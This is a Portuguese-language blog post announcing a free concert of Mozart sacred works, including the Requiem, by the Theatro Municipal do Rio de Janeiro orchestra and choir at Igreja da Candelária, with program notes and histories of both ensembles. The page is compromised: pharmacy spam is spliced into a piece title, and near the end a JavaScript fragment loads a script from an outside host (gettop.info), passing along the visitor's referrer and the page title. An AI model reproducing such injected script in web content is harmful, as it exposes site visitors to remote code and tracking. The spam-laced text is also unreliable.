LateralMúsica coralMúsica sinfônicaRio de Janeiro

Theatro Municipal RJ e Projeto Candelária

Orquestra Sinfônica e Coro do Theatro municipal apresentam programa Mozart na Igreja da Candelária.

SERVIÇO

 

Igreja da Candelária
Praça Pio X, s/nº, Centro

Telefone: 21 3211-7000

Dia 12.04 (quinta-feira), às 18h30

Entrada  Franca

 

A convite da Igreja do Santíssimo Sacramento da Candelária, a Orquestra Sinfônica e o Coro do Theatro Municipal, vinculado à Secretaria de Estado de Cultura, apresentam-se em concerto com repertório calcado em uma  seleção de  representativas obras sacras compostas por Mozart.

O programa, que será regido pelo Diretor Artístico e Maestro Titular da OSTM, Silvio Viegas,  conta com os solistas:

– Daniela Gregório – Soprano
– Andressa Inácio – Mezzo
– Geraldo Mathias – Tenor
– Maurício Luz – Baixo

 

PROGRAMA

W. A. Mozart

Laudate Dominum

É parte integrante de Vesperae Solennes de Confessore, Kv. 339 e foi composta em setembro de 1780 a partir de salmos bíblicos. A peça Vesperae Solennes de Confessore, Kv. 339 é especialmente conhecida pela bela ária para soprano.

Ave verum corpus elavil on line us pharmacy

É um pequeno hino eucarístico e foi musicado por diversos compositores ao longo dos séculos. A peça data do século XIV e foi atribuída  aos Papas Inocêncio III, Inocêncio IV e Inocêncio VI. É baseado em um poema daquela época derivado de um manuscrito da Abadia de Reichneau. Mozart compôs a peça na época em que vivia sob o comando severo do Bispo Colloredo. Adepto de teses iluministas, o religioso defendia que as missas deveriam ser curtas e objetivas, não dando nenhum espaço para longas “missas-oratórios”.

Réquiem em ré menor K 626

É uma missa fúnebre e data de 1791. É a última obra  do compositor austríaco e está entre as mais famosas de seu repertório, não só pela qualidade musical mas também pelos debates em torno de até onde ela foi escrita por Mozart antes de sua morte. A peça teria sido finalizada pelo amigo e discípulo Franz Xaver Submayr . É esta versão completa que será apresentada pelo Coro e a Orquestra do Theatro Municipal.

Esta última peça foi escolhida como uma singela homenagem às 17 vítimas do desabamento dos três prédios da Avenida Treze de Maio, vizinhos ao Theatro Municipal.

 

Orquestra Sinfônica do Theatro Municipal

O Theatro Municipal do Rio de Janeiro funcionava há mais de duas décadas quando, em 02 de maio de 1931, pelo Decreto nº 3.506, foi criada a sua Orquestra Sinfônica, por decisão do Interventor Federal da Cidade do Rio de Janeiro, Adolfo Bergamini. Quatro meses mais tarde, após os músicos terem sido contratados por concurso, a Orquestra Sinfônica do Theatro Municipal estreava a 05 de setembro de 1931, sob a batuta do Maestro Francisco Braga, seu primeiro regente titular. A apresentação contou com o tenor italiano Tito Schipa como solista. A OSTM completou  80 anos em 2011, tendo à frente Silvio Viegas como seu Maestro Titular. Com seus mais de 80 músicos, o corpo orquestral figura entre os mais tradicionais do Brasil.

 

Coro do Theatro Municipal

O  Coro do Theatro Municipal foi criado em 02 de maio de 1931, através do decreto nº 3506, pelo então Interventor Federal da Cidade do Rio de Janeiro, Adolfo Bergamini.

A estreia do Coro do Theatro Municipal, já organizado e completo, somente se daria em 1933, sob a regência de Santiago Guerra, que foi seu maestro titular até 1975. O fato do maestro Guerra ter ficado este longo período na Direção não impediu que o Coro tivesse vários regentes convidados para dirigi-lo em diversas ocasiões, como Oscar Leone, Gianni Lazzari, Norberto Mola, Andrea Morosini e Romano Gandolfi. Após a aposentadoria de Santiago Guerra, foram seus diretores: Celso Cavalcanti, Zuinglio Faustini, Andrés Máspero e Manuel Cellario. Atualmente, Maurilio dos Santos Costa responde pela regência.O Coro possui vasto repertório que vai desde Monteverdi até os mais jovens compositores de hoje.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.